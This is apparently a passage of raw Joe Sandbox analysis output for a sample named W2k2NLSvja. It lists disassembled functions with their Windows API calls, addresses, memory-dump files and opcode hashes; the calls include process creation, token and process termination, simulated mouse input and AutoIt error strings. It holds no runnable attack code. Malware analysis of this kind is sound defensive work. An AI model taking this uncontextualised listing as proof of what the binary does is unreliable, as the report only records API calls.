                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1827037458-0
                                                                                                                        • Opcode ID: f381eff10e51d1c7245937bfc94cd3727e7d2d44f81349608156b327602bd2e8
                                                                                                                        • Instruction ID: 91b5cf0f6b48ebbb9539dcdf24aea253295091f614de8d762f3eb1c9b2de1485
                                                                                                                        • Opcode Fuzzy Hash: f381eff10e51d1c7245937bfc94cd3727e7d2d44f81349608156b327602bd2e8
                                                                                                                        • Instruction Fuzzy Hash: EA41CDB1500301AFD721EF25CC84FFA7BE8FB4A724F140728F994861A1D736A806EB61
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(010467B0,00000000,01695B68,?,?,010467B0,?,0100B862,?,?), ref: 0100B9CC
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 0100B9F0
                                                                                                                        • ShowWindow.USER32(010467B0,00000000,01695B68,?,?,010467B0,?,0100B862,?,?), ref: 0100BA50
                                                                                                                        • ShowWindow.USER32(00000000,00000004,?,0100B862,?,?), ref: 0100BA62
                                                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 0100BA86
                                                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0100BAA9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 642888154-0
                                                                                                                        • Opcode ID: 770adce1846c5635300755deb9c75107cd872a55a7981c2df89913d44ab34ea6
                                                                                                                        • Instruction ID: 56dd3969023a705c0a890b0f2b19d394021dac4af7c3ccf07786c3f3b6702f01
                                                                                                                        • Opcode Fuzzy Hash: 770adce1846c5635300755deb9c75107cd872a55a7981c2df89913d44ab34ea6
                                                                                                                        • Instruction Fuzzy Hash: 73413438600141AFEB67CF18C489BA57FE1FB06715F1841F9EA888F6E6C7319445DB51
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00FF5134,?,?,00000000,00000001), ref: 00FF73BF
                                                                                                                          • Part of subcall function 00FF3C94: GetWindowRect.USER32(?,?), ref: 00FF3CA7
                                                                                                                        • GetDesktopWindow.USER32 ref: 00FF73E9
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00FF73F0
                                                                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00FF7422
                                                                                                                          • Part of subcall function 00FE54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE555E
                                                                                                                        • GetCursorPos.USER32(?), ref: 00FF744E
                                                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00FF74AC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4137160315-0
                                                                                                                        • Opcode ID: 1df167401c91e445f1f54a92a5f98e0166b8ac60c85fc671e5ac8cb8622e62c1
                                                                                                                        • Instruction ID: 62e636f9663c03bad295e73b14b02e568e8f85dede7131ce71c702d3072b8ee4
                                                                                                                        • Opcode Fuzzy Hash: 1df167401c91e445f1f54a92a5f98e0166b8ac60c85fc671e5ac8cb8622e62c1
                                                                                                                        • Instruction Fuzzy Hash: 8531D47250830AABD730DF14D849F6BBBE9FF88314F000919F588A7191CB75E909DB92
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FD85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FD8608
                                                                                                                          • Part of subcall function 00FD85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FD8612
                                                                                                                          • Part of subcall function 00FD85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FD8621
                                                                                                                          • Part of subcall function 00FD85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FD8628
                                                                                                                          • Part of subcall function 00FD85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FD863E
                                                                                                                        • GetLengthSid.ADVAPI32(?,00000000,00FD8977), ref: 00FD8DAC
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FD8DB8
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00FD8DBF
                                                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00FD8DD8
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00FD8977), ref: 00FD8DEC
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00FD8DF3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3008561057-0
                                                                                                                        • Opcode ID: 86d634eba32655ac63e41cecf89dff0e8e5a84a95c25d7099610eda190d59fc8
                                                                                                                        • Instruction ID: 75e3943965cc8035c5181839fba0b7006a9aa94495cb701765a4e39f43b192bf
                                                                                                                        • Opcode Fuzzy Hash: 86d634eba32655ac63e41cecf89dff0e8e5a84a95c25d7099610eda190d59fc8
                                                                                                                        • Instruction Fuzzy Hash: E411DF31900605FFDB21DF64CC08BAE777BEF553A5F18401AF88593280CB369901EB60
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FD8B2A
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00FD8B31
                                                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FD8B40
                                                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00FD8B4B
                                                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FD8B7A
                                                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00FD8B8E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1413079979-0
                                                                                                                        • Opcode ID: d97a005f6ad532a436b14217234d91acfc810a8e544dbc1c6da581471f7e1580
                                                                                                                        • Instruction ID: 7e189817f146259fe03b536cfb3a2973bbe0cb2995a56436f01f7fa4ed8e6d41
                                                                                                                        • Opcode Fuzzy Hash: d97a005f6ad532a436b14217234d91acfc810a8e544dbc1c6da581471f7e1580
                                                                                                                        • Instruction Fuzzy Hash: 51118CB250020AABDF22CFA4DC49FDE7BA9FF48358F084056FE04A2150C7768D61AB61
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F8134D
                                                                                                                          • Part of subcall function 00F812F3: SelectObject.GDI32(?,00000000), ref: 00F8135C
                                                                                                                          • Part of subcall function 00F812F3: BeginPath.GDI32(?), ref: 00F81373
                                                                                                                          • Part of subcall function 00F812F3: SelectObject.GDI32(?,00000000), ref: 00F8139C
                                                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0100C1C4
                                                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 0100C1D8
                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0100C1E6
                                                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 0100C1F6
                                                                                                                        • EndPath.GDI32(00000000), ref: 0100C206
                                                                                                                        • StrokePath.GDI32(00000000), ref: 0100C216
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 43455801-0
                                                                                                                        • Opcode ID: c216bc41e54d828f63e84950890a385b280617fce77ef5f3163d1e95d9781cce
                                                                                                                        • Instruction ID: 448c743bef64ba2a40b738c228406efcfb5fc88eb59c35186b60f442c24b29c6
                                                                                                                        • Opcode Fuzzy Hash: c216bc41e54d828f63e84950890a385b280617fce77ef5f3163d1e95d9781cce
                                                                                                                        • Instruction Fuzzy Hash: 25115E7600010DBFEF229F94DC88FDA3FACEB08350F048151BA48461A5D7769D95EBA0
                                                                                                                        APIs
                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FA03D3
                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FA03DB
                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FA03E6
                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FA03F1
                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FA03F9
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FA0401
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4278518827-0
                                                                                                                        • Opcode ID: c2e2a8e205a596f1f0629439e6e323dd62fee0066efa869ad00b16e27ad306b0
                                                                                                                        • Instruction ID: b6e77dd55adf3cbc40442f8eb72ecb0c1450f09a3a826d779fecce4f4c8c6ae8
                                                                                                                        • Opcode Fuzzy Hash: c2e2a8e205a596f1f0629439e6e323dd62fee0066efa869ad00b16e27ad306b0
                                                                                                                        • Instruction Fuzzy Hash: 9D016CB090175A7DE3008F6A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                                                                                        APIs
                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00FE569B
                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00FE56B1
                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00FE56C0
                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FE56CF
                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FE56D9
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FE56E0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 839392675-0
                                                                                                                        • Opcode ID: 7689ff38643b3cee7d7c1139e7cb1b0dd0c3d91196acb42aae48f7476c49c7cc
                                                                                                                        • Instruction ID: 65eb127f92b2bc3f06ceab05de267f413dc71a45298274786925ba9b4bda23f6
                                                                                                                        • Opcode Fuzzy Hash: 7689ff38643b3cee7d7c1139e7cb1b0dd0c3d91196acb42aae48f7476c49c7cc
                                                                                                                        • Instruction Fuzzy Hash: 59F06D3224115ABBE3325BA29C0DEEB7B7CEBCAB21F000159FA40D10409AA61A01A7B5
                                                                                                                        APIs
                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00FE74E5
                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,00F91044,?,?), ref: 00FE74F6
                                                                                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,00F91044,?,?), ref: 00FE7503
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00F91044,?,?), ref: 00FE7510
                                                                                                                          • Part of subcall function 00FE6ED7: CloseHandle.KERNEL32(00000000,?,00FE751D,?,00F91044,?,?), ref: 00FE6EE1
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FE7523
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00F91044,?,?), ref: 00FE752A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3495660284-0
                                                                                                                        • Opcode ID: d75ea6610a8a189857e537b0aadfc709aef35f1f253b0cae9a79517841bf0a0d
                                                                                                                        • Instruction ID: d15422e8efc7e49369cc24f1c82401ce153ca92730df2f617fbcac810590c429
                                                                                                                        • Opcode Fuzzy Hash: d75ea6610a8a189857e537b0aadfc709aef35f1f253b0cae9a79517841bf0a0d
                                                                                                                        • Instruction Fuzzy Hash: 18F05E3A544713EBDB323B64FC8C9EB7B2AEF45312F040521F282D10A8CB7A5801EB90
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FD8E7F
                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00FD8E8B
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00FD8E94
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00FD8E9C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00FD8EA5
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00FD8EAC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 146765662-0
                                                                                                                        • Opcode ID: 27d89349b61a38275d016bb25bcb413a96e2e924f7186123d395bbede39bf002
                                                                                                                        • Instruction ID: d82eeb8144335d3076d5c397a13ba6d18da09fbbc643793b18bfac08ed8f583d
                                                                                                                        • Opcode Fuzzy Hash: 27d89349b61a38275d016bb25bcb413a96e2e924f7186123d395bbede39bf002
                                                                                                                        • Instruction Fuzzy Hash: 12E0ED36004502BBD7226FE1EC0C945BF79FF89722F108220F259C1068CB375460EB50
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00FF8928
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00FF8A37
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00FF8BAF
                                                                                                                          • Part of subcall function 00FE7804: VariantInit.OLEAUT32(00000000), ref: 00FE7844
                                                                                                                          • Part of subcall function 00FE7804: VariantCopy.OLEAUT32(00000000,?), ref: 00FE784D
                                                                                                                          • Part of subcall function 00FE7804: VariantClear.OLEAUT32(00000000), ref: 00FE7859
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                        • API String ID: 4237274167-1221869570
                                                                                                                        • Opcode ID: 16a1114bea2f151cf3b57f63e536cd76b81e452c9ebfe5d9c93108fe97600e6a
                                                                                                                        • Instruction ID: 795c3736f942c6712632e564c48960221cd4a375637afbad47a8a82b9903c1ef
                                                                                                                        • Opcode Fuzzy Hash: 16a1114bea2f151cf3b57f63e536cd76b81e452c9ebfe5d9c93108fe97600e6a
                                                                                                                        • Instruction Fuzzy Hash: 4B91BD71608305DFC710EF24C88496ABBE4EFC8754F04896EF99A8B361DB35E906DB52
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F9FEC6: _wcscpy.LIBCMT ref: 00F9FEE9
                                                                                                                        • _memset.LIBCMT ref: 00FE3077
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FE30A6
                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FE3159
                                                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00FE3187
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 4152858687-4108050209
                                                                                                                        • Opcode ID: c071f30fc6330134b7e3c6c3f4891733ed4dec583aadbbf01382116961e21973
                                                                                                                        • Instruction ID: 311d48105bd7091154e3cbddb2c49cf50905dc0da445ec99f7513f6523ca1df8
                                                                                                                        • Opcode Fuzzy Hash: c071f30fc6330134b7e3c6c3f4891733ed4dec583aadbbf01382116961e21973
                                                                                                                        • Instruction Fuzzy Hash: 18510471E083809BD7259F2AC84D66BBBE4EF85364F040A2DF891D3191DB79CE44A752
                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FDDAC5
                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FDDAFB
                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FDDB0C
                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FDDB8E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                        • String ID: DllGetClassObject
                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                        • Opcode ID: 80283e0252d29d15f395e6cc56f45ad0cf68476097bfbb012d7f52924611cdee
                                                                                                                        • Instruction ID: 908f845c566a4dec566f3a0b11a49c3db410c358735086087beedd7d94620d30
                                                                                                                        • Opcode Fuzzy Hash: 80283e0252d29d15f395e6cc56f45ad0cf68476097bfbb012d7f52924611cdee
                                                                                                                        • Instruction Fuzzy Hash: D1418FB1600208EFDB15CF54C884A9A7BAAEF84354F1981ABED059F305D7B5DD44EBA0
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00FE2CAF
                                                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00FE2CCB
                                                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00FE2D11
                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01046890,00000000), ref: 00FE2D5A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 1173514356-4108050209
